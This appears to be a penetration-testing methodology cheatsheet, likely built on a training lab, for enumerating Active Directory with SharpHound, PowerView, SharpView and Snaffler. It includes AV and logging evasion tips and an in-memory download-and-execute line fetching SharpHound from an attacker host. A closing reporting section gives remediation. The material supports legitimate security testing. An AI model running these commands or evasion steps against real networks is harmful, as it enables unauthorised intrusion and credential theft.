🛡️ Methodology Checklist
- SharpHound collection:
.\SharpHound.exe -c All --zipfilename loot.zip - PowerView — users:
Get-DomainUser | select samaccountname,memberof - PowerView — Kerberoastable:
Get-DomainUser -SPN - PowerView — ASREPRoastable:
Get-DomainUser -PreauthNotRequired - PowerView — admin count:
Get-DomainGroup -AdminCount - PowerView — computers:
Get-DomainComputer -Unconstrained - Snaffler for share secrets:
.\Snaffler.exe -s -o snaffler.txt - Import BloodHound data and identify attack paths
🎯 Operational Context
Use when: Operating from a Windows foothold with valid AD credentials — enumerate AD via PowerView, SharpHound, or built-in cmdlets.
Think Dumber First: Run SharpHound first — SharpHound.exe -c All --zipfilename loot.zip. Then transfer to attack box and load into BloodHound GUI. PowerView is for targeted queries after you know what to look for.
Skip when: AV/EDR is active and blocking PowerShell — switch to native LDAP queries via dsquery or net commands (LOL).
⚡ Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
Import-Module ActiveDirectory | Load the native AD PowerShell module |
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName | Find Kerberoastable users (SPN set) |
Get-ADTrust -Filter * | Enumerate all domain trust relationships |
Get-ADGroupMember -Identity "[GROUP]" | List members of an AD group |
Get-DomainUser -Identity [USER] -Domain [DOMAIN] | Select-Object name,samaccountname,description,memberof,pwdlastset,admincount,serviceprincipalname | PowerView — detailed user object |
Get-DomainGroupMember -Identity "[GROUP]" -Recurse | PowerView — recursive group membership (finds nested privileges) |
Get-DomainTrustMapping | PowerView — map all domain trusts |
Test-AdminAccess -ComputerName [HOSTNAME] | PowerView — check if current user has local admin on a host |
.\SharpView.exe Get-DomainUser -Identity [USER] | .NET port of PowerView — use when PS is monitored |
.\SharpView.exe Get-DomainGroupMember -Identity "[GROUP]" -Recurse | SharpView recursive group membership |
Snaffler.exe -s -d [DOMAIN] -o snaffler.log -v data | Hunt for sensitive files on all domain shares |
.\SharpHound.exe -c All --zipfilename bh_output | Collect all BloodHound data from Windows |
🔬 Deep Dive & Workflow
Native AD Module (Blend In)
Using built-in cmdlets generates traffic indistinguishable from legitimate admin activity:
Import-Module ActiveDirectory
Get-ADDomain
# Kerberoastable accounts — immediate targets
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName
# Trust relationships — pivot to other domains
Get-ADTrust -Filter *
# Group membership
Get-ADGroupMember -Identity "Domain Admins"PowerView — Targeted Enumeration
Import-Module .\PowerView.ps1
# Full user object for a target
Get-DomainUser -Identity wley -Domain INLANEFREIGHT.LOCAL | Select-Object -Property name,samaccountname,description,memberof,whencreated,pwdlastset,lastlogontimestamp,accountexpires,admincount,userprincipalname,serviceprincipalname,useraccountcontrol
# Recursive group membership — ALWAYS use -Recurse for high-value groups
Get-DomainGroupMember -Identity "Domain Admins" -Recurse
# Trust mapping
Get-DomainTrustMapping
# Check local admin rights across hosts
Test-AdminAccess -ComputerName ACADEMY-EA-MS01Recursive flag is mandatory — many DA members inherit rights through nested secondary groups. Without -Recurse, they are invisible.
SharpView (.NET) — When PS Is Restricted
If PowerShell Script Block Logging or AMSI blocks PowerView:
.\SharpView.exe Get-DomainUser -Identity wley
.\SharpView.exe Get-DomainGroupMember -Identity "Domain Admins" -RecurseExecutes identical methods via native .NET — bypasses many PS-level detection rules.
Snaffler — Share Pillaging
Automatically discovers sensitive files (.kdb, .key, .sqldump, credential files) across all accessible domain shares:
Snaffler.exe -s -d INLANEFREIGHT.LOCAL -o snaffler.log -v data-v datarestricts console output to actionable findings (default output is overwhelming)-osaves full raw output to log file- Targets file extensions and content patterns associated with credentials
SharpHound — BloodHound Collection
.\SharpHound.exe -c All --zipfilename ACADEMY_BLOU.zipCollects: object properties, ACLs, sessions, local group memberships, domain trusts, GPOs.
Upload zip to BloodHound GUI. Key built-in queries:
Find Shortest Paths to Domain AdminsFind All Domain AdminsComputers with Unsupported Operating Systems→ verify these hosts actually respond before acting on them (stale objects persist in AD)
Kerberoastable SPN Discovery
Look for ServicePrincipalName when running Get-ADUser or PowerView — these accounts are immediate Kerberoast targets.
🛠️ Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| SharpHound.exe detected by AV | Default signature match | Use in-memory: IEX (New-Object Net.WebClient).DownloadString('http://[LHOST]/SharpHound.ps1'); Invoke-BloodHound -c All |
| PowerView Import-Module fails | Execution policy blocks | Set-ExecutionPolicy Bypass -Scope Process -Force or load via IEX |
| BloodHound shows no data after import | Wrong collection method | Collect with -c All not default; ensure DNS resolves domain controllers by hostname |
| PowerView Get-DomainUser returns nothing | No AD module | Confirm domain join: (Get-WmiObject Win32_ComputerSystem).PartOfDomain; reconnect VPN if lab |
| SharpHound zip import fails in BloodHound | Neo4j version mismatch | Update BloodHound CE or use BloodHound Legacy with matching SharpHound version |
📝 Reporting Trigger
Finding Title: Active Directory Attack Path Mapped via SharpHound Collection Impact: Complete BloodHound dataset reveals shortest privilege escalation paths to Domain Admin, including Kerberoastable accounts, ACL abuse chains, and unconstrained delegation targets. Root Cause: Standard user accounts have excessive AD enumeration rights. No monitoring on SharpHound-style LDAP query patterns. Recommendation: Deploy Microsoft Defender for Identity. Alert on bulk LDAP queries from workstations. Review and restrict AD ACL permissions. Implement Tier 0/1/2 administrative model.